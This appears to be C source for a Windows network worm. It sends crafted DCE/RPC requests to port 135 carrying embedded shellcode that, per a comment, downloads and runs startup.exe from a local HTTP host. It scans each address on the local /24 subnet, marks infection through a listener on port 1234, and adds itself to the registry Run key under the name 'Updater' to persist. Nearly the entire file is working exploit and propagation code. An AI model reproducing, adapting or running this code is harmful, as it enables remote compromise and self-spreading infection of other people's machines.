#undef UNICODE

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <tchar.h>

#pragma comment (lib, "Ws2_32.lib")


unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\x9d\x13\x00\x01" /* universal return address x0100139d */
    
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* dwnld and execute from http://192.168.171.1/startup.exe shellcode */
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x89\xe0\xd9\xc1\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
	"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
	"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
	"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
	"\x48\x6b\x44\x30\x42\x76\x44\x73\x49\x50\x45\x34\x4e\x6b\x43"
	"\x70\x46\x50\x4f\x75\x4f\x30\x43\x48\x44\x4c\x4c\x4b\x51\x50"
	"\x44\x4c\x4c\x4b\x42\x50\x47\x6c\x4c\x6d\x4c\x4b\x47\x30\x47"
	"\x78\x4a\x4b\x46\x69\x4e\x6b\x47\x30\x46\x54\x4c\x4d\x43\x70"
	"\x43\x4c\x4c\x4b\x51\x50\x47\x4c\x43\x6e\x4f\x33\x45\x30\x4c"
	"\x4b\x50\x6c\x44\x64\x47\x54\x4e\x6b\x51\x55\x45\x6c\x4c\x4b"
	"\x46\x34\x46\x65\x51\x68\x43\x33\x49\x45\x4e\x6b\x50\x4a\x42"
	"\x38\x4c\x4b\x50\x5a\x51\x30\x43\x33\x4b\x6d\x4b\x53\x45\x64"
	"\x51\x59\x4e\x6b\x50\x34\x4e\x6b\x44\x43\x49\x65\x46\x53\x49"
	"\x6f\x46\x53\x4f\x30\x49\x6c\x4c\x6c\x4c\x44\x4f\x30\x44\x34"
	"\x45\x57\x49\x51\x4a\x6f\x46\x6d\x43\x33\x4b\x48\x4a\x4b\x4b"
	"\x44\x45\x6b\x51\x6c\x51\x34\x44\x68\x50\x75\x48\x61\x4e\x6b"
	"\x51\x4a\x45\x74\x45\x53\x49\x4d\x43\x56\x4e\x6b\x46\x6c\x50"
	"\x4b\x4c\x4b\x50\x5a\x47\x6c\x47\x73\x4b\x6d\x4e\x6b\x44\x44"
	"\x4e\x6b\x46\x63\x4a\x65\x4e\x69\x43\x74\x44\x64\x47\x6c\x43"
	"\x51\x48\x43\x48\x6b\x50\x52\x4c\x6d\x50\x50\x42\x72\x4a\x48"
	"\x4e\x48\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x47\x77\x4b\x33\x49"
	"\x54\x46\x68\x4c\x43\x48\x47\x45\x54\x45\x6b\x49\x61\x43\x45"
	"\x48\x6c\x4b\x73\x4e\x6e\x42\x6e\x44\x4e\x4a\x4c\x4f\x55\x42"
	"\x37\x46\x61\x43\x4c\x45\x4f\x42\x59\x46\x6a\x4d\x38\x4b\x4b"
	"\x4f\x67\x49\x6d\x46\x6f\x50\x72\x4b\x4e\x4e\x53\x44\x56\x48"
	"\x6f\x48\x4e\x49\x70\x45\x30\x45\x79\x50\x44\x4a\x48\x43\x67"
	"\x51\x59\x4a\x4d\x44\x4f\x43\x4e\x4c\x4b\x50\x4b\x4a\x43\x43"
	"\x6f\x43\x6e\x4f\x73\x4a\x4c\x51\x6c\x4c\x4b\x48\x6c\x4d\x38"
	"\x42\x6a\x49\x6f\x4b\x4f\x4b\x4f\x4c\x4b\x4a\x70\x4a\x4b\x45"
	"\x52\x4a\x4b\x47\x75\x4d\x38\x4a\x59\x49\x6f\x49\x6f\x4b\x4f"
	"\x46\x38\x48\x6b\x47\x72\x4a\x4b\x42\x46\x4e\x6d\x51\x6d\x51"
	"\x50\x4f\x54\x4f\x70\x43\x4e\x49\x6f\x4b\x4f\x43\x45\x4c\x39"
	"\x42\x6f\x48\x76\x44\x57\x4c\x4b\x48\x70\x4f\x73\x48\x6e\x47"
	"\x4a\x49\x6e\x42\x6e\x44\x46\x4c\x4d\x43\x4d\x43\x34\x4c\x4b"
	"\x4a\x6e\x4c\x43\x4f\x31\x46\x78\x4b\x58\x4d\x5a\x4b\x4f\x4b"
	"\x4f\x49\x6f\x4c\x43\x4f\x31\x46\x6c\x4e\x58\x46\x61\x42\x4e"
	"\x42\x45\x51\x64\x4b\x71\x4b\x48\x45\x58\x50\x50\x50\x68\x50"
	"\x77\x51\x79\x50\x6e\x43\x59\x4e\x6b\x4b\x6c\x46\x31\x46\x32"
	"\x42\x73\x49\x6f\x51\x45\x45\x54\x43\x6a\x43\x69\x4c\x4b\x4a"
	"\x70\x4d\x38\x45\x38\x4b\x4f\x4b\x4f\x4b\x4f\x45\x63\x4b\x70"
	"\x42\x70\x50\x50\x46\x30\x50\x50\x42\x70\x4b\x4f\x46\x35\x45"
	"\x4c\x4c\x49\x47\x35\x44\x74\x47\x43\x49\x50\x42\x70\x42\x70"
	"\x42\x70\x50\x50\x4e\x6d\x43\x6d\x43\x70\x51\x43\x4b\x4f\x50"
	"\x75\x47\x44\x4b\x4f\x51\x45\x47\x50\x4c\x49\x47\x35\x46\x58"
	"\x48\x6b\x45\x52\x48\x6b\x42\x53\x50\x33\x49\x50\x4c\x70\x43"
	"\x55\x42\x70\x43\x58\x51\x71\x44\x6e\x43\x55\x44\x38\x4e\x69"
	"\x42\x45\x44\x70\x46\x53\x4b\x70\x46\x30\x4c\x70\x4d\x52\x46"
	"\x30\x4e\x50\x47\x72\x46\x30\x50\x32\x49\x50\x42\x70\x50\x50"
	"\x4c\x70\x47\x30\x4a\x61\x4d\x30\x47\x68\x46\x30\x4b\x4f\x42"
	"\x55\x46\x50\x49\x6f\x50\x55\x46\x68\x4b\x39\x47\x35\x45\x6c"
	"\x44\x73\x4f\x30\x51\x76\x4f\x48\x44\x4c\x45\x51\x46\x4b\x4d"
	"\x30\x4c\x4b\x4b\x44\x4e\x6d\x51\x4e\x43\x34\x51\x43\x51\x76"
	"\x4c\x78\x45\x54\x43\x31\x42\x70\x4e\x6d\x51\x56\x47\x78\x42"
	"\x70\x49\x6f\x42\x55\x47\x48\x4b\x4f\x46\x35\x45\x74\x4c\x4b"
	"\x50\x46\x43\x34\x4b\x35\x4b\x70\x50\x74\x44\x56\x44\x73\x4b"
	"\x70\x46\x30\x4c\x4d\x51\x56\x44\x44\x50\x50\x49\x6f\x43\x46"
	"\x45\x54\x4c\x4d\x43\x76\x46\x68\x42\x70\x4b\x4f\x44\x35\x47"
	"\x4c\x49\x6f\x51\x45\x44\x4c\x4a\x4b\x4a\x70\x49\x6f\x50\x75"
	"\x47\x4c\x4b\x4f\x50\x55\x46\x70\x44\x73\x49\x50\x51\x76\x48"
	"\x38\x44\x4c\x47\x71\x45\x53\x4b\x50\x4a\x4b\x44\x42\x48\x6b"
	"\x51\x36\x46\x53\x4a\x69\x4c\x71\x42\x74\x46\x4b\x4d\x31\x4e"
	"\x6b\x49\x6c\x44\x73\x4f\x30\x49\x63\x4d\x7a\x4c\x4b\x4b\x4c"
	"\x4b\x76\x45\x57\x47\x34\x4e\x6d\x44\x37\x47\x34\x46\x36\x43"
	"\x67\x42\x70\x46\x30\x46\x30\x46\x30\x46\x30\x50\x50\x4b\x4f"
	"\x43\x45\x50\x30\x42\x70\x49\x6f\x50\x55\x42\x34\x49\x6f\x50"
	"\x55\x46\x78\x4a\x48\x4b\x6d\x49\x6e\x4b\x4f\x4b\x4f\x42\x48"
	"\x42\x54\x42\x54\x50\x70\x47\x4a\x44\x6f\x44\x6f\x50\x31\x45"
	"\x69\x46\x52\x44\x6e\x44\x71\x44\x76\x47\x48\x44\x6e\x50\x31"
	"\x50\x37\x46\x51\x46\x4e\x45\x61\x44\x6f\x51\x63\x43\x44\x50"
	"\x61\x42\x52\x43\x44\x50\x75\x42\x50\x44\x6e\x43\x55\x43\x48"
	"\x42\x45\x49\x6f\x48\x4c\x48\x4c\x4a\x6c\x48\x4c\x48\x4c\x4a"
	"\x6c\x48\x4c\x48\x4c\x4a\x6c\x48\x4c\x48\x4c\x48\x4c\x4a\x6c"
	"\x48\x4c\x4a\x6c\x43\x5a\x45\x51\x4b\x58\x50\x34\x46\x63\x41"
	"\x41\x90\x90\x90";


unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};


int Exploit(unsigned char *ip)
{
    
    int sock;
    int len,len1;
    unsigned int target_id;
    struct sockaddr_in target_ip;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        printf("socket\n");
        return(-1);
    }

    memset(&target_ip,0,sizeof(struct sockaddr_in));
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(ip);
    target_ip.sin_port = htons(port);
    

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
		closesocket(sock);
        printf("connect\n");
        return(-2);
    }
    
    

    
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
    
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
    

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  

    
    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            printf("Send\n");
            return(-1);
    }
    len=recv(sock, buf1, 1000, 0);
    
    if (send(sock,buf2,len1,0)== -1)
    {
            printf("Send2\n");
            return(-1);
    }
    closesocket(sock);

    
	return(1);
}




//thread to listen on port 1234
DWORD WINAPI listenerThread(LPVOID lpParam ){

	int error,len;
	int Socket,ClientSocket;
	struct sockaddr_in addr;
	struct sockaddr_in client;


	if((Socket = socket(AF_INET, SOCK_STREAM, 0))<0) 
	{
		printf("Error opening socket\n",WSAGetLastError());
		return -1;
	}

	
	addr.sin_family = AF_INET;
	addr.sin_port = htons(1234);
	addr.sin_addr.s_addr = INADDR_ANY;

	if((bind(Socket,(struct sockaddr*)&addr, sizeof(addr)))<0) 
	{
		printf("Bind error\n",WSAGetLastError());
		return -1;
	}

	if((listen(Socket,5))<0) 
	{
		printf("Error listening\n",WSAGetLastError());
		return -1;
	}
	else
		printf("Listening\n");
    
	while(1)
	{
		if((ClientSocket=accept(Socket, (struct sockaddr*)&client, NULL))<0)
		{
			printf("Error Accepting connection \n",WSAGetLastError());
			return -1;
		}
        
	}
    
    closesocket(Socket);
}


//check whether target ip is already infected
int checkInfection(unsigned char *ip){
	int sock;

    struct sockaddr_in target_ip;


    if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        printf("socket\n");
        return(-1);
    }

    memset(&target_ip,0,sizeof(struct sockaddr_in));
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(ip);
    target_ip.sin_port = htons(1234);
    

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
		closesocket(sock);
        return(0);
    }
	else{
		closesocket(sock);
		return 1;
	}
	closesocket(sock);
	return 0;

}





//try exploiting the target ip
int ExploitNetwork(unsigned char *ipa){
    struct in_addr victim;
    struct in_addr netmask;
    struct in_addr ip;
    char p[16];
    unsigned char nm[]="255.255.255.0";
    ip.s_addr=inet_addr(ipa);
    netmask.s_addr = inet_addr(nm);
    victim.s_addr = ip.s_addr & netmask.s_addr;
    while((victim.s_addr & netmask.s_addr) == (ip.s_addr & netmask.s_addr))
	{
		 printf("Victim IP is %s\n", inet_ntoa(victim));
		 if(checkInfection(inet_ntoa(victim))!=1)
			Exploit(inet_ntoa(victim));
		 victim.s_addr=htonl(ntohl(victim.s_addr)+1);            
    }
}
//add a startup entry
int addtoStartup()
{
    TCHAR exepath[MAX_PATH];
    GetModuleFileName(0, exepath, MAX_PATH);
    HKEY hKey;
    LONG lnRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey);
    if( ERROR_SUCCESS == lnRes )
    {
        lnRes = RegSetValueEx(hKey,"Updater",0,REG_SZ,exepath,strlen(exepath));
    }
    
    return 1;
}

int getRegValue(){
    HKEY key;
    char value[2];
    DWORD value_length = 2*sizeof(char);   
        
    if(RegOpenKey(HKEY_CURRENT_USER, "Updater", &key) != ERROR_SUCCESS)
    {
       printf("Unable to open registry key to read\n");
       return 0;
    }
    RegQueryValueEx(key, "updater_flag", NULL, NULL, (LPBYTE)&value, &value_length);
    if(strlen(value)>0)
                     return 1;
    else
        return 0;
    RegCloseKey(key);
}


int main(){

	char name[255];
	PHOSTENT hostinfo;  
    char *ip;  
    WSADATA wsadata;
    HKEY key;

	DWORD buffersize = 8000;
	char lpData[8000];
	LPDWORD lpdwDisp = &buffersize;
    LONG i;

	int Data_Of_Thread = 1;
    HANDLE Handle_Of_Thread = 0;
	HANDLE Array_Of_Thread_Handles[1];



    WSAStartup(MAKEWORD(2,0),&wsadata);
    
    addtoStartup();  //add entry in registry 

	//create thread to listen on port 1234
	Handle_Of_Thread = CreateThread( NULL, 0, listenerThread, &Data_Of_Thread, 0, NULL);  
    if ( Handle_Of_Thread == NULL)
        ExitProcess(Data_Of_Thread);
	
	Array_Of_Thread_Handles[0] = Handle_Of_Thread;


    if(getRegValue()==1)
	{
		printf("Value was set\n");
    }
    else{

         
	//get all the ip of system on different interfaces, generate victim ip on subnet and try exploit   
		if( gethostname ( name, sizeof(name)) == 0)
		{
		   if((hostinfo = gethostbyname(name)) != NULL)
		   {
				int nCount = 0;
				while(hostinfo->h_addr_list[nCount])
				{
					ip = inet_ntoa(*(struct in_addr *)hostinfo->h_addr_list[nCount]);
			//       ip=(struct in_addr*)hostinfo->h_addr_list[nCount];
					printf("Generating victims for IP: %s\n",ip);
					ExploitNetwork(ip);
					++nCount;
				}
		   }
		}
		i = RegCreateKeyEx(HKEY_CURRENT_USER,"Updater", 0,NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key,lpdwDisp);
		if(i == ERROR_SUCCESS)
   		{
     
			if (RegOpenKey(HKEY_CURRENT_USER, "Updater", &key) != ERROR_SUCCESS)
			{
			   printf("Unable to open registry key to write\n");
			}
    
			if(RegSetValueEx(key, TEXT("updater_flag"), 0, REG_SZ, (LPBYTE)"OK", 2*sizeof(char)) != ERROR_SUCCESS)
			{
			 //  RegCloseKey(key);
			   printf("Unable to set registry value OK\n");
			}
			RegCloseKey(key);
		}
		else
			printf("Error Creating key\n");
	}


	//wait for thread to finish ie: continue listening on port 1234
	WaitForMultipleObjects( 1, Array_Of_Thread_Handles, TRUE, INFINITE);
    // Close thread handles upon completion.
    CloseHandle(Handle_Of_Thread);
    
	WSACleanup();

    getch();
}
